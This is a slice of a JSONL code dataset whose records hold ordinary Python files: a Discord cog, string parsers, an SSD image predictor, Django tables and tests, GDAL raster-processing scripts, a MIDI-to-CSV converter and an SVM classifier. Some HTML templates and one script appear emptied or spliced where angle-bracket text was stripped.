message.delete()\n\n\ndef setup(bot):\n bot.add_cog(Administrator(bot))","sub_path":"cogs/administrator.py","file_name":"administrator.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"222406235","text":"def last_char(string):\n # Return the position of the last character in the string\n # that is neither a space nor a tab. 
Returns zero for null or empty strings.\n last = 0\n for i in range(len(string)):\n if string[i] != ' ' and string[i] != '\\t':\n last = i + 1\n return last\n\ndef strip(cmd, p1):\n # Strip space and tab separated substrings out of a string.\n # Returns True if at least one word is stripped, False otherwise.\n char_cnt = 0 # Count of processed characters\n len_cmd = len(cmd) # Length of command string\n len_p1 = len(p1) # Length of substring\n more = True # More work to do\n stripped = False # Haven't stripped word\n\n while more and char_cnt < len_cmd:\n c1 = cmd[0] # Get leading character\n if c1 == ' ' or c1 == '\\t': # Strip away separators\n cmd = cmd[1:]\n char_cnt += 1\n else: # Found non-separator char\n if stripped:\n more = False # All done\n else: # Extract substring\n stripped = True\n pos_of_sp = cmd.find(' ') # Find position of next separator\n pos_of_tab = cmd.find('\\t')\n if pos_of_sp == -1:\n pos_of_sp = len_cmd\n if pos_of_tab == -1:\n pos_of_tab = len_cmd\n pos_of_sep = min(pos_of_sp, pos_of_tab)\n len_word = pos_of_sep\n p1 = cmd[:min(len_word, len_p1)] # Save the word\n cmd = cmd[min(pos_of_sep, len_cmd):] # Remove word from cmd\n char_cnt += len_word\n\n return stripped\n\ndef rd_int(string):\n # Strip the leading substring out of STRING and try to convert it into an integer.\n # Returns a tuple (success, number) where success is a boolean indicating if the conversion was successful,\n # and number is the integer value if success is True.\n stripped = strip(string, '')\n if not stripped:\n return False, None\n\n try:\n number = int(string)\n return True, number\n except ValueError:\n return False, None\n\ndef rd_logical(string):\n # Strip the leading substring out of STRING and try to convert it into a logical value.\n # Returns a tuple (success, value) where success is a boolean indicating if the conversion was successful,\n # and value is the logical value if success is True.\n stripped = strip(string, '')\n if not stripped:\n return False, None\n\n if string.lower() == 'true':\n return True, True\n elif string.lower() == 'false':\n return True, False\n else:\n return False, None\n\ndef rd_hex(string):\n # Strip the leading substring out of STRING and try to convert it from a hexadecimal string into an integer.\n # Returns a tuple (success, number) where success is a boolean indicating if the conversion was successful,\n # and number is the integer value if success is True.\n stripped = strip(string, '')\n if not stripped:\n return False, None\n\n try:\n number = int(string, 16)\n return True, number\n except ValueError:\n return False, None\n\ndef rd_real(string):\n # Strip the leading substring out of STRING andtry to convert it into a float.\n # Returns a tuple (success, number) where success is a boolean indicating if the conversion was successful,\n # and number is the float value if success is True.\n stripped = strip(string, '')\n if not stripped:\n return False, None\n\n try:\n number = float(string)\n return True, number\n except ValueError:\n return False, None\n\n","sub_path":"src/shared/stringlib.py","file_name":"stringlib.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"30766327","text":"import tensorflow as tf\nfrom PIL import Image\nimport sys\nimport numpy as np\nfrom PIL import Image, ImageDraw\nimport time\nimport model\nfrom settings import *\nimport utils\n\n\ndef main(argv, trained_model):\n all_default_box_list = utils.get_all_default_boxes()\n 
with tf.Graph().as_default(), tf.Session() as sess:\n input_img = tf.placeholder(dtype=tf.float32, shape=[1, IMG_W, IMG_H, 3], name='input')\n pred_cls, pred_loc = model.ssd_model(input_img, False)\n saver = tf.train.Saver()\n saver.restore(sess, trained_model)\n #sess.run(tf.global_variables_initializer())\n for img in argv:\n image = Image.open(img)\n image_w = image.width\n image_h = image.height\n image = image.resize([IMG_W, IMG_H])\n image = np.asarray(image)\n image = image - 127.5\n img_batch = []\n img_batch.append(image)\n t0 = time.time()\n cls, loc = sess.run([pred_cls, pred_loc], feed_dict={input_img: img_batch})\n #print(np.shape(cls), np.shape(loc))\n print(time.time() - t0)\n #cls = np.reshape(cls, newshape=[NUM_CLASS, NUM_ALL_DEFAULT_BOX])\n #loc = np.reshape(loc, newshape=[4, NUM_ALL_DEFAULT_BOX])\n #print(cls, loc)\n pred_box = utils.resolve(cls, loc, all_default_box_list)\n #resized_pred_box = []\n image = Image.open(img)\n draw = ImageDraw.Draw(image)\n for box in pred_box:\n tl_x = box[0] / IMG_W * image_w\n tl_y = box[1] / IMG_H * image_h\n br_x = box[2] / IMG_W * image_w\n br_y = box[3] / IMG_H * image_h\n #resized_pred_box.append([tl_x, tl_y, br_x, br_y])\n draw.rectangle([tl_x, tl_y, br_x, br_y])\n image.save('output_' + img, \"JPEG\")\n\n return 0\n\nif __name__ == '__main__':\n trained_model = './checkpoints/ssd_60000.ckpt'\n main(sys.argv[1:], trained_model)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"29502609","text":"import django_tables2 as tables\nfrom django.template import Context\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.gis.geos import GEOSGeometry\nfrom django.utils import simplejson\nimport models\n\n\nclass JellyfishObservationTable(tables.Table):\n # LinkColum does not work with localeurl\n # date_observed = tables.LinkColumn('data_observation_update', args=[A('pk')])\n date_observed = tables.TemplateColumn(\n \"\"\"\n {{ record.date_observed|date:'d/m/Y H:i'}}\n \n \"\"\")\n observation_station = tables.Column()\n jellyfish_specie = tables.Column()\n quantity = tables.Column()\n source = tables.Column()\n created_by = tables.Column()\n route = None\n\n def __init__(self, *args, **kwargs):\n self.route = kwargs.pop('route', None)\n super(JellyfishObservationTable, self).__init__(*args, **kwargs)\n if self.route:\n self.context = Context({'route': self.route})\n self.base_columns['date_observed'].template_code = \"\"\"\n \n {{ record.date_observed|date:'d/m/Y H:i'}}\n \n \"\"\"\n\n class Meta:\n model = models.JellyfishObservation\n attrs = {\"class\": \"table table-striped\"}\n sequence = fields = (\n 'date_observed',\n 'observation_station',\n 'jellyfish_specie',\n 'quantity',\n 'created_by',\n 'source',\n )\n\n @property\n def verbose_name(self):\n if getattr(self, 'display_name', None):\n return self.display_name\n return self.Meta.model._meta.verbose_name_plural.title()\n\n\nclass JellyfishObservationExportTable(JellyfishObservationTable):\n date_observed = tables.Column()\n\n def __init__(self, *args, **kwargs):\n self.route = kwargs.pop('route', None)\n super(JellyfishObservationExportTable, self).__init__(*args, **kwargs)\n\n\nclass JellyfishObservationAggregatedTable(tables.Table):\n x = tables.Column(empty_values=())\n y = tables.Column(empty_values=())\n sum_quantity = tables.Column()\n station_name = tables.Column()\n route_name = tables.Column()\n\n 
def render_x(self, record):\n return \"{:.6f}\".format(GEOSGeometry(record['observation_station__position']).x)\n\n def render_y(self, record):\n return \"{:.6f}\".format(GEOSGeometry(record['observation_station__position']).y)\n\n @property\n def json(self):\n data = []\n for record in self.rows:\n data.append({\n 'lat': float(record['y']),\n 'lng': float(record['x']),\n 'station': record['station_name'],\n 'route': record['route_name'],\n 'count': record['sum_quantity']})\n return simplejson.dumps(data)\n\n def __init__(self, *args, **kwargs):\n self.route = kwargs.pop('route', None)\n super(JellyfishObservationAggregatedTable, self).__init__(*args, **kwargs)\n\n class Meta:\n attrs = {\"class\": \"table table-striped\"}\n\n\nclass ObservationRouteTable(tables.Table):\n name = tables.TemplateColumn(\n \"\"\"\n {{ record.name }}\n \n \"\"\")\n create_observation = tables.TemplateColumn(\n \"\"\"{% load i18n %}\n \n \n {% trans 'Add' %} {% trans 'observation' %}\n \"\"\",\n verbose_name=_('create observation'))\n\n class Meta:\n model = models.ObservationRoute\n attrs = {\"class\": \"table table-striped\"}\n fields = (\n 'name',\n )\n\n\nclass ObservationBeachTable(tables.Table):\n name = tables.TemplateColumn(\n \"\"\"\n {{ record.name }}\n \n \"\"\")\n island = tables.Column()\n municipality = tables.Column()\n create_observation = tables.TemplateColumn(\n \"\"\"{% load i18n %}\n \n \n {% trans 'Add' %} {% trans 'observation' %}\n \"\"\",\n verbose_name=_('create observation'))\n\n class Meta:\n model = models.ObservationRoute\n attrs = {\"class\": \"table table-striped\"}\n fields = (\n 'name',\n 'island',\n 'municipality',\n )\n","sub_path":"grumers/apps/data/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"374871757","text":"\"\"\"Graph a histogram of a remotely sensed image\"\"\"\nimport gdalnumeric\nimport turtle as t\n\ndef histogram(a, bins=range(0,256)):\n \"\"\"\n Histogram function for multi-dimensional array.\n a = array\n bins = range of numbers to match \n \"\"\"\n fa = a.flat\n n = gdalnumeric.numpy.searchsorted(gdalnumeric.numpy.sort(fa), bins)\n n = gdalnumeric.numpy.concatenate([n, [len(fa)]])\n hist = n[1:]-n[:-1] \n return hist\n\ndef draw_histogram(hist, scale=True):\n t.color(\"black\")\n # Draw the axes\n axes = ((-355, -200),(355, -200),(-355, -200),(-355, 250))\n t.up()\n for p in axes:\n t.goto(p)\n t.down()\n # Labels\n t.up()\n t.goto(0, -250)\n t.write(\"VALUE\",font=(\"Arial,\",12,\"bold\"))\n t.up()\n t.goto(-400, 280)\n t.write(\"FREQUENCY\",font=(\"Arial,\",12,\"bold\"))\n # Tick marks\n # x axis\n x = -355\n y = -200\n t.up()\n for i in range(1,11):\n x = x+65\n t.goto(x,y)\n t.down()\n t.goto(x,y-10)\n t.up()\n t.goto(x,y-25)\n t.write(\"%s\" % (i*25), align=\"center\")\n # y axis\n x = -355\n y = -200\n t.up()\n pixels = sum(hist[0])\n if scale:\n max = 0\n for h in hist:\n hmax = h.max()\n if hmax > max:\n max = hmax\n pixels = max\n label = pixels/10\n for i in range(1,11):\n y = y+45\n t.goto(x,y)\n t.down()\n t.goto(x-10,y)\n t.up()\n t.goto(x-15,y-6)\n t.write(\"%s\" % (i*label), align=\"right\")\n # Plot each histogram as a colored line\n x_ratio = 709.0 / 256\n y_ratio = 450.0 / pixels\n # Add more colors to this list if comparing\n # more than 3 bands or 1 image\n colors = [\"red\", \"green\", \"blue\"]\n for j in range(len(hist)):\n h = hist[j]\n x = -354\n y = -199\n t.up()\n t.goto(x,y)\n t.down()\n 
t.color(colors[j])\n for i in range(256):\n x = i * x_ratio\n y = h[i] * y_ratio\n x = x - (709/2)\n y = y + -199\n t.goto((x,y))\n \nim = \"swap.tif\"\nhistograms = []\narr = gdalnumeric.LoadFile(im)\nfor b in arr:\n histograms.append(histogram(b))\ndraw_histogram(histograms)\n\n# Hide our pen\nt.pen(shown=False)\nt.done() \n\n\n\n\n\n\n\n\"\"\"Perform a histogram stretch on an image\"\"\"\nimport gdalnumeric\nimport operator\n\ndef histogram(a, bins=range(0,256)):\n \"\"\"\n Histogram function for multi-dimensional array.\n a = array\n bins = range of numbers to match \n \"\"\"\n fa = a.flat\n n = gdalnumeric.numpy.searchsorted(gdalnumeric.numpy.sort(fa), bins)\n n = gdalnumeric.numpy.concatenate([n, [len(fa)]])\n hist = n[1:]-n[:-1] \n return hist\n\ndef stretch(a):\n \"\"\"\n Performs a histogram stretch on a gdalnumeric array image.\n \"\"\"\n hist = histogram(a)\n lut = []\n for b in range(0, len(hist), 256):\n # step size\n step = reduce(operator.add, hist[b:b+256]) / 255\n # create equalization lookup table\n n = 0\n for i in range(256):\n lut.append(n / step)\n n = n + hist[i+b]\n gdalnumeric.numpy.take(lut, a, out=a)\n return a\n\nsrc = \"swap.tif\"\narr = gdalnumeric.LoadFile(src)\nstretched = stretch(arr)\ngdalnumeric.SaveArray(arr, \"stretched.tif\", format=\"GTiff\", prototype=src)\n\n\n\n\n\"\"\"Clip a raster image using a shapefile\"\"\"\nimport operator\nimport gdal, gdalnumeric, osr\nimport shapefile\nimport Image, ImageDraw\n\n# Raster image to clip\nraster = \"stretched.tif\"\n\n# Polygon shapefile used to clip\nshp = \"hancock.shp\"\n\n# Name of clipped raster file(s)\noutput = \"clip\"\n \ndef imageToArray(i):\n \"\"\"\n Converts a Python Imaging Library array to a gdalnumeric image.\n \"\"\"\n a=gdalnumeric.numpy.fromstring(i.tostring(),'b')\n a.shape=i.im.size[1], i.im.size[0]\n return a\n \ndef world2Pixel(geoMatrix, x, y):\n \"\"\"\n Uses a gdal geomatrix (gdal.GetGeoTransform()) to calculate\n the pixel location of a geospatial coordinate \n \"\"\"\n ulX = geoMatrix[0]\n ulY = geoMatrix[3]\n xDist = geoMatrix[1]\n yDist = geoMatrix[5]\n rtnX = geoMatrix[2]\n rtnY = geoMatrix[4]\n pixel = int((x - ulX) / xDist)\n line = int((ulY - y) / xDist)\n return (pixel, line) \n\n# Load the source data as a gdalnumeric array\nsrcArray = gdalnumeric.LoadFile(raster)\n\n# Also load as a gdal image to get geotransform (world file) info\nsrcImage = gdal.Open(raster)\ngeoTrans = srcImage.GetGeoTransform()\n\n# Use pyshp to open the shapefile\nr = shapefile.Reader(\"%s.shp\" % shp)\n\n# Convert the layer extent to image pixel coordinates\nminX, minY, maxX, maxY = r.bbox\nulX, ulY = world2Pixel(geoTrans, minX, maxY)\nlrX, lrY = world2Pixel(geoTrans, maxX, minY)\n\n# Calculate the pixel size of the new image\npxWidth = int(lrX - ulX)\npxHeight = int(lrY - ulY)\n\nclip = srcArray[:, ulY:lrY, ulX:lrX]\n\n# Create a new geomatrix for the image\ngeoTrans = list(geoTrans)\ngeoTrans[0] = minX\ngeoTrans[3] = maxY\n\n# Map points to pixels for drawing the county boundary \n# on a blank 8-bit, black and white, mask image.\npixels = []\nfor p in r.shape(0).points:\n pixels.append(world2Pixel(geoTrans, p[0], p[1]))\nrasterPoly = Image.new(\"L\", (pxWidth, pxHeight), 1)\n# Create a blank image in PIL to draw the polygon.\nrasterize = ImageDraw.Draw(rasterPoly)\nrasterize.polygon(pixels, 0)\n# Convert the PIL image to a NumPy array\nmask = imageToArray(rasterPoly) \n\n# Clip the image using the mask\nclip = gdalnumeric.numpy.choose(mask, (clip, 0)).astype(gdalnumeric.numpy.uint8)\n\n# Save ndvi 
as tiff\ngdalnumeric.SaveArray(clip, \"%s.tif\" % output, format=\"GTiff\", prototype=raster)\n\n\n\n\n\n\"\"\"Classify a remotely sensed image\"\"\"\nimport gdalnumeric\n\n# Input file name (thermal image) \nsrc = \"thermal.tif\"\n\n# Output file name\ntgt = \"classified.jpg\"\n\n# Load the image into numpy using gdal\nsrcArr = gdalnumeric.LoadFile(src)\n\n# Split the histogram into 20 bins as our classes\nclasses = gdalnumeric.numpy.histogram(srcArr, bins=20)[1]\n\n# Color look-up table (LUT) - must be len(classes)+1.\n# Specified as R,G,B tuples \nlut = [[255,0,0],[191,48,48],[166,0,0],[255,64,64],\n[255,115,115],[255,116,0],[191,113,48],[255,178,115],\n[0,153,153],[29,115,115],[0,99,99],[166,75,0],\n[0,204,0],[51,204,204],[255,150,64],[92,204,204],[38,153,38],[0,133,0],\n[57,230,57],[103,230,103],[184,138,0]]\n\n# Starting value for classification\nstart = 1\n\n# Set up the RGB color JPEG output image\nrgb = gdalnumeric.numpy.zeros((3, srcArr.shape[0], srcArr.shape[1],), gdalnumeric.numpy.float32)\n \n# Process all classes and assign colors\nfor i in range(len(classes)):\n mask = gdalnumeric.numpy.logical_and(start <= srcArr, srcArr <= classes[i])\n for j in range(len(lut[i])):\n rgb[j] = gdalnumeric.numpy.choose(mask, (rgb[j], lut[i][j]))\n start = classes[i]+1 \n\n# Save the image \ngdalnumeric.SaveArray(rgb.astype(gdalnumeric.numpy.uint8), tgt, format=\"JPEG\")\n\n\n\n\n\"\"\"Threshold an image to black and white\"\"\"\nimport gdalnumeric\n\n# Input file name (thermal image) \nsrc = \"islands.tif\"\n\n# Output file name\ntgt = \"islands_classified.tiff\"\n\n# Load the image into numpy using gdal\nsrcArr = gdalnumeric.LoadFile(src)\n\n# Split the histogram into 20 bins as our classes\nclasses = gdalnumeric.numpy.histogram(srcArr, bins=2)[1]\n\nlut = [[255,0,0],[0,0,0],[255,255,255]]\n\n# Starting value for classification\nstart = 1\n\n# Set up the output image\nrgb = gdalnumeric.numpy.zeros((3, srcArr.shape[0], srcArr.shape[1],), gdalnumeric.numpy.float32)\n \n# Process all classes and assign colors\nfor i in range(len(classes)):\n mask = gdalnumeric.numpy.logical_and(start <= srcArr, srcArr <= classes[i])\n for j in range(len(lut[i])):\n rgb[j] = gdalnumeric.numpy.choose(mask, (rgb[j], lut[i][j]))\n start = classes[i]+1 \n\n# Save the image \ngdalnumeric.SaveArray(rgb.astype(gdalnumeric.numpy.uint8), tgt, format=\"GTIFF\", prototype=src)\n\n\n\n\n\n\n\"\"\"Automatically extract features of a thresholded image to a shapefile\"\"\"\nimport gdal\nimport ogr, osr\n\n# Thresholded input raster name\nsrc = \"islands_classified.tiff\"\n# Output shapefile name\ntgt = \"extract.shp\"\n# OGR layer name\ntgtLayer = \"extract\"\n# Open the input raster\nsrcDS = gdal.Open(src)\n# Grab the first band\nband = srcDS.GetRasterBand(1)\n# Force gdal to use the band as a mask\nmask = band\n# Set up the output shapefile\ndriver = ogr.GetDriverByName(\"ESRI Shapefile\")\nshp = driver.CreateDataSource(tgt)\n# Copy the spatial reference\nsrs = osr.SpatialReference()\nsrs.ImportFromWkt(srcDS.GetProjectionRef())\nlayer = shp.CreateLayer(tgtLayer, srs=srs)\n# Set up the dbf file\nfd = ogr.FieldDefn( \"DN\", ogr.OFTInteger )\nlayer.CreateField(fd)\ndst_field = 0\n# Automatically extract features from an image!\nextract = gdal.Polygonize(band, mask, layer, dst_field, [], None)\n\n\n\n\n\n\n\"\"\"Rasterize a shapefile and account for polygon holes\"\"\"\nimport shapefile\nimport pngcanvas\n# Open the extracted islands\nr = shapefile.Reader(\"extract.shp\")\n# Setup the world to pixels conversion\nxdist = 
r.bbox[2] - r.bbox[0]\nydist = r.bbox[3] - r.bbox[1]\niwidth = 800\niheight = 600\nxratio = iwidth/xdist\nyratio = iheight/ydist\npolygons = []\n# Loop through all shapes\nfor shape in r.shapes():\n # Loop through all parts to catch\n # polygon holes!\n for i in range(len(shape.parts)):\n pixels=[]\n pt = None\n if i3.4f}\".format(note.start), \"{:0>3.4f}\".format(note.end), \"{:3.4f}\".format(note.duration), note.velocity])\r\n\r\n\r\n\r\ntry:\r\n midi_dir = sys.argv[1]\r\nexcept IndexError:\r\n raise SystemExit(f\"Usage: {sys.argv[0]} \")\r\n\r\nfor filename in os.listdir(midi_dir):\r\n if filename.endswith(\".mid\"):\r\n process_midi(os.path.join(midi_dir, filename))\r\n","sub_path":"midi2csv.py","file_name":"midi2csv.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248055627","text":"import os\nimport h5py\n\n# Returns an array of the indices [ix1, .. ixn] such that ixi is the index of the \n# element in the longer list that is closest to the ith value in the shorter list\n# So \"element i is closest to element ixi\"\ndef find_closest_indices(longer_list, shorter_list):\n if len(shorter_list) > len(longer_list):\n print('THE SYNTAX IS THAT THE LONGER LIST MUST GO FIRST')\n raise KeyError \n new_list = []\n ix_star =0\n for item2 in shorter_list:\n ix = 0\n for item1 in longer_list:\n diff = abs(item1 - item2)\n if ix == 0:\n closest = diff\n ix_star = ix\n elif (diff < closest and ix != 0):\n closest = diff\n ix_star = ix\n ix+=1\n new_list.append(ix_star)\n return new_list\n\ndef create_link(ad, name, newline = True, html_line_break=True, bootstrap = False):\n if bootstrap == True:\n newline = False\n html_line_break = False\n \n if newline == True and html_line_break == True:\n ad = r'\"' + ad + r'\"'\n new_line = '' + name + '
</a><br>\\n' \n    if newline == False and html_line_break == True:\n        ad = r'\"' + ad + r'\"'\n        new_line = '<a href=' + ad + '>' + name + '</a><br>
'\n    if newline == True and html_line_break == False:\n        ad = r'\"' + ad + r'\"'\n        new_line = '<a href=' + ad + '>' + name + '</a>\\n'\n    if newline == False and html_line_break == False: \n        ad = r'\"' + ad + r'\"'\n        new_line = '<a href=' + ad + '>' + name + '</a>'\n    if bootstrap == True:\n        new_line = '
<li>' + new_line + '</li>\\n'\n    \n    return new_line\n\ndef find_substring(sub, string):\n    index = string.find(sub)\n    return index\n\ndef grab_between(first_key, last_key, text_file, ends = False):\n    file = open(text_file, 'r')\n    contents = file.read()\n    file.close()\n    ix0 = find_substring(first_key, contents)\n    ix1 = find_substring(last_key, contents)\n    \n    if ends == False:\n        text_between_keys = contents[ix0 + len(first_key) : ix1] \n    else: \n        text_between_keys = contents[ix0 : ix1 + len(last_key)]\n    \n    return text_between_keys\n\ndef make_textbox(vartup, nametup, cur_min = None, cur_max = None):\n    textbox = ( nametup[0] + ' (current value:' + str(cur_min) \n                + ''') \\n\n                
<input type=\"text\" name=\"''' + vartup[0] + '''\">    \\n'''\n                + nametup[1] +' (current value:' + str(cur_max)\n                +''')\\n\n                <input type=\"text\" name=\"''' + vartup[1] + '''\">
    \\n''' )\n return textbox\n\ndef filter_h5(path):\n fnames = os.listdir(path)\n good_list = []\n for fname in fnames:\n try:\n h5py.File(path + fname)\n good_list.append(fname)\n except:\n pass\n return good_list","sub_path":"awakeAppModules/ancillary_funcs.py","file_name":"ancillary_funcs.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"336735450","text":"dict1 = {'서울': '서울특별시',\n '부산': '부산광역시',\n '대구': '대구광역시',\n '인천': '인천광역시',\n '광주': '광주광역시',\n '대전': '대전광역시',\n '울산': '울산광역시',\n '세종': '세종특별자치시',}\nfor i in dict1.keys():\n dict1[i + '시'] = dict1[i]\n\ndict2 = {'경기': '경기도',\n '강원': '강원도',\n '충북': '충청북도',\n '충남': '충청남도',\n '전남': '전라남도',\n '전북': '전라북도',\n '경남': '경상남도',\n '경북': '경상북도',\n '제주': '제주특별자치도',\n '제주도': '제주특별자치도'}\n\ndict1.update(dict2)\n\nfor key in dict1.keys():\n shinhan.sido[shinhan.sido == key] = dict1[key]","sub_path":"pj1/nationalpn.py","file_name":"nationalpn.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"59766799","text":"import os\nimport sys\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nfrom random import choice, choices\n\nimport process_fp\nimport gensim as gn\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\n\ndef load_data(buckets, k):\n\n X = []\n y = []\n\n for bucket in buckets:\n for i in range(k):\n seq = choices(buckets[bucket], k=200)\n seq = sorted(seq)\n X.append(seq)\n y.append(bucket)\n\n return X, y\n\ndef create_w2v(vocabulary):\n w2v = gn.models.Word2Vec(min_count=1, size=25, window=2)\n w2v.build_vocab(vocabulary, progress_per=10000)\n w2v.train(vocabulary, total_examples=w2v.corpus_count, epochs=30)\n return w2v\n\ndef create_Sentences(buckets):\n sentences = []\n\n for bucket in buckets:\n sentences.append(buckets[bucket])\n\n return sentences\n\ndef preprocess(X, y, sentences):\n\n w2v = create_w2v(sentences)\n\n for x in X:\n for i in range(len(x)):\n fp = x[i]\n x[i] = w2v.wv[fp]\n\n le = LabelEncoder()\n le.fit_transform(y)\n\n X = np.array(X)\n nsamples, nx, ny = X.shape\n X = X.reshape((nsamples, nx*ny))\n\n return X, y, le\n\ndef clean_dir(direc):\n for f in os.listdir(direc):\n os.remove(os.path.join(direc, f))\n\ndef model(X, y):\n\n svc = SVC(kernel='sigmoid')\n svc.fit(X, y)\n\n return svc\n\ndef process_train(train_direc, data_direc):\n process_fp.preprocess(train_direc, data_direc)\n allfps, buckets = process_fp.process(train_direc, data_direc)\n\n X, y = load_data(buckets, 100)\n\n sentences = create_Sentences(buckets)\n X, y, labels = preprocess(X, y, sentences)\n\n clean_dir(data_direc)\n return X, y, sentences\n\ndef process_test(test_direc, data_direc, train_sentences, samples):\n process_fp.preprocess(test_direc, data_direc)\n alltestsfps, test_buckets = process_fp.process(test_direc, data_direc)\n\n X_test, y_test = load_data(test_buckets, samples)\n\n test_sentences = create_Sentences(test_buckets)\n X_test, y_test, labels = preprocess(X_test, y_test, (train_sentences + test_sentences))\n\n clean_dir(data_direc)\n return X_test, y_test\n\ndef detect_errors(svc, X_test, y_test):\n\n y_pred = svc.predict(X_test)\n\n print(confusion_matrix(y_test, y_pred))\n print(classification_report(y_test, y_pred))\n print('Accuracy Score: ', 
accuracy_score(y_test, y_pred))\n\n\nX_train, y_train, train_buckets = process_train('train/', 'data/')\n\nX_test, y_test = process_test('test/', 'data/', train_buckets, 30)\n\nsvc = model(X_train, y_train)\n\ndetect_errors(svc, X_test, y_test)","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"447463745","text":"from datetime import datetime, timedelta, date\nfrom unittest.mock import patch, Mock\n\nfrom django.test import TestCase, override_settings\nfrom django.core.cache import caches\nfrom django.core import mail\n\nfrom django_webtest import WebTest\nfrom model_mommy import mommy\n\nfrom evap.evaluation.models import (Contribution, Course, CourseType, EmailTemplate, NotArchiveable, Question,\n Questionnaire, RatingAnswerCounter, Semester, TextAnswer, UserProfile)\nfrom evap.evaluation.tests.tools import let_user_vote_for_course\nfrom evap.results.tools import calculate_average_distribution\nfrom evap.results.views import get_course_result_template_fragment_cache_key\n\n\n@override_settings(EVALUATION_END_OFFSET_HOURS=0)\nclass TestCourses(WebTest):\n def test_approved_to_in_evaluation(self):\n course = mommy.make(Course, state='approved', vote_start_datetime=datetime.now())\n\n with patch('evap.evaluation.models.EmailTemplate.send_to_users_in_courses') as mock:\n Course.update_courses()\n\n template = EmailTemplate.objects.get(name=EmailTemplate.EVALUATION_STARTED)\n mock.assert_called_once_with(template, [course], [EmailTemplate.ALL_PARTICIPANTS],\n use_cc=False, request=None)\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(course.state, 'in_evaluation')\n\n def test_in_evaluation_to_evaluated(self):\n course = mommy.make(Course, state='in_evaluation', vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today() - timedelta(days=1))\n\n with patch('evap.evaluation.models.Course.is_fully_reviewed') as mock:\n mock.__get__ = Mock(return_value=False)\n Course.update_courses()\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(course.state, 'evaluated')\n\n def test_in_evaluation_to_reviewed(self):\n # Course is \"fully reviewed\" as no open text answers are present by default.\n course = mommy.make(Course, state='in_evaluation', vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today() - timedelta(days=1))\n\n Course.update_courses()\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(course.state, 'reviewed')\n\n def test_in_evaluation_to_published(self):\n # Course is \"fully reviewed\" and not graded, thus gets published immediately.\n course = mommy.make(Course, state='in_evaluation', vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today() - timedelta(days=1),\n is_graded=False)\n\n with patch('evap.evaluation.tools.send_publish_notifications') as mock:\n Course.update_courses()\n\n mock.assert_called_once_with([course])\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(course.state, 'published')\n\n @override_settings(EVALUATION_END_WARNING_PERIOD=24)\n def test_evaluation_ends_soon(self):\n course = mommy.make(Course, vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today() + timedelta(hours=24))\n\n self.assertFalse(course.evaluation_ends_soon())\n\n course.vote_end_date = date.today()\n self.assertTrue(course.evaluation_ends_soon())\n\n course.vote_end_date = date.today() - 
timedelta(hours=48)\n self.assertFalse(course.evaluation_ends_soon())\n\n @override_settings(EVALUATION_END_WARNING_PERIOD=24, EVALUATION_END_OFFSET_HOURS=24)\n def test_evaluation_ends_soon_with_offset(self):\n course = mommy.make(Course, vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today())\n\n self.assertFalse(course.evaluation_ends_soon())\n\n course.vote_end_date = date.today() - timedelta(hours=24)\n self.assertTrue(course.evaluation_ends_soon())\n\n course.vote_end_date = date.today() - timedelta(hours=72)\n self.assertFalse(course.evaluation_ends_soon())\n\n def test_evaluation_ended(self):\n # Course is out of evaluation period.\n mommy.make(Course, state='in_evaluation', vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today() - timedelta(days=1), is_graded=False)\n # This course is not.\n mommy.make(Course, state='in_evaluation', vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today(), is_graded=False)\n\n with patch('evap.evaluation.models.Course.evaluation_end') as mock:\n Course.update_courses()\n\n self.assertEqual(mock.call_count, 1)\n\n def test_approved_to_in_evaluation_sends_emails(self):\n \"\"\" Regression test for #945 \"\"\"\n participant = mommy.make(UserProfile, email='foo@example.com')\n course = mommy.make(Course, state='approved', vote_start_datetime=datetime.now(), participants=[participant])\n\n Course.update_courses()\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(course.state, 'in_evaluation')\n\n def test_has_enough_questionnaires(self):\n # manually circumvent Course's save() method to have a Course without a general contribution\n # the semester must be specified because of https://github.com/vandersonmota/model_mommy/issues/258\n Course.objects.bulk_create([mommy.prepare(Course, semester=mommy.make(Semester), type=mommy.make(CourseType))])\n course = Course.objects.get()\n self.assertEqual(course.contributions.count(), 0)\n self.assertFalse(course.general_contribution_has_questionnaires)\n self.assertFalse(course.all_contributions_have_questionnaires)\n\n responsible_contribution = mommy.make(\n Contribution, course=course, contributor=mommy.make(UserProfile),\n responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS)\n course = Course.objects.get()\n self.assertFalse(course.general_contribution_has_questionnaires)\n 